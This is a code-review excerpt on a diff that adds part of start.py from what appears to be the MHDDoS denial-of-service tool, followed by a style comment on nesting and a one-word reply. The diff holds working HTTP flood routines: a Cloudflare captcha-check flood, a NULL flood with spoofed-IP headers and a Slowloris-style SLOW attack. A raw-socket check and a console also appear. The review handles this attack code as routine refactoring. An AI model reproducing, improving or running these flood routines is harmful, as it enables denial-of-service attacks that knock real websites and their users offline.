tools/mhddos/start.py

```diff
@@ -0,0 +1,1194 @@
+            + self.randHeadercontent
+            + dep
+        ), str.encode(
+            "%s %s/cdn-cgi/l/chk_captcha HTTP/1.1\r\n" % (self._req_type, self._target)
+            + "Host: %s\r\n" % hexh
+            + self.randHeadercontent
+            + dep
+        )
+        with suppress(Exception), self.open_connection() as s:
+            Tools.send(s, p1)
+            for _ in range(self._rpc):
+                Tools.send(s, p2)
+
+    def NULL(self) -> None:
+        payload: Any = str.encode(
+            self._payload
+            + f"Host: {self._get_host()}\r\n"
+            + "User-Agent: null\r\n"
+            + "Referrer: null\r\n"
+            + self.SpoofIP
+            + "\r\n"
+        )
+        with suppress(Exception), self.open_connection() as s:
+            for _ in range(self._rpc):
+                Tools.send(s, payload)
+
+    def SLOW(self):
+        payload: bytes = self.generate_payload()
+        with suppress(Exception), self.open_connection() as s:
+            for _ in range(self._rpc):
+                Tools.send(s, payload)
+            while Tools.send(s, payload) and s.recv(1):
+                for i in range(self._rpc):
+                    keep = str.encode("X-a: %d\r\n" % ProxyTools.Random.rand_int(1, 5000))
+                    Tools.send(s, keep)
+                    sleep(self._rpc / 15)
+                    break
+
+
+class ToolsConsole:
+    METHODS = {"INFO", "TSSRV", "CFIP", "DNS", "PING", "CHECK", "DSTAT"}
+
+    @staticmethod
+    def checkRawSocket():
+        with suppress(OSError):
+            with socket(AF_INET, SOCK_RAW, IPPROTO_TCP):
+                return True
+        return False
+
+    @staticmethod
+    def runConsole():
+        cons = f"{gethostname()}@MHTools:~#"
+
+        while 1:
+            cmd = input(cons + " ").strip()
+            if not cmd:
+                continue
+            if " " in cmd:
+                cmd, args = cmd.split(" ", 1)
+
+            cmd = cmd.upper()
+            if cmd == "HELP":
+                print("Tools:" + ", ".join(ToolsConsole.METHODS))
+                print("Commands: HELP, CLEAR, BACK, EXIT")
+                continue
+
+            if {cmd} & {"E", "EXIT", "Q", "QUIT", "LOGOUT", "CLOSE"}:
+                exit(-1)
+
+            if cmd == "CLEAR":
+                print("\033c")
+                continue
+
+            if not {cmd} & ToolsConsole.METHODS:
+                print(f"{cmd} command not found")
+                continue
+
+            if cmd == "DSTAT":
+                with suppress(KeyboardInterrupt):
+                    ld = net_io_counters(pernic=False)
+
+                    while True:
+                        sleep(1)
+
+                        od = ld
+                        ld = net_io_counters(pernic=False)
+
+                        t = [(last - now) for now, last in zip(od, ld)]
+
+                        logger.info(
+                            (
```

Comment:
This part looks overly complicated with multiple levels of nesting. It’s better to move the `with suppress` block into a separate function to make the code clearer. For example:  

### Before:  
```python  
if condition:  
    with suppress(SomeError):  
        do_something()  
        if another_condition:  
            do_another_thing()  
```  

### After:  
```python  
def handle_something():  
    with suppress(SomeError):  
        do_something()  

if condition:  
    handle_something()  
    if another_condition:  
        do_another_thing()  
```  

This reduces the nesting and makes the main function more readable.

Reply:
Removed